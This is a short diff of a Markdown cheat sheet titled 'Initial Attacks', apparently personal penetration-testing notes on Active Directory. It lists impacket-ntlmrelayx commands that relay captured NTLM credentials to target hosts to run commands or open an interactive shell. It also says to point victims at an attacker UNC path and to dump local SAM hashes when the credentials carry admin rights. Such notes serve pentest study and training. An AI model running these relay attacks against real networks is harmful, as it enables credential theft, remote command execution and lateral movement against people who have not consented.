sulabh915/Cheatsheet_database_and_scripts/Active_directory/Initial Attacks.md

 impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami" #command impacket-ntlmrelayx -tf targets.txt -smb2support -i #interactive terminal

-#point victum machine to attacker machine somehow ,
+#point victum machine to attacker machine somehow , like //<Attacker-IP>

 #impacket script relay to targets.txt hosts , if the captured credentials have #valid account in relayed hosts with "Administrative privileges" then we dump #sam local hash or perform other action.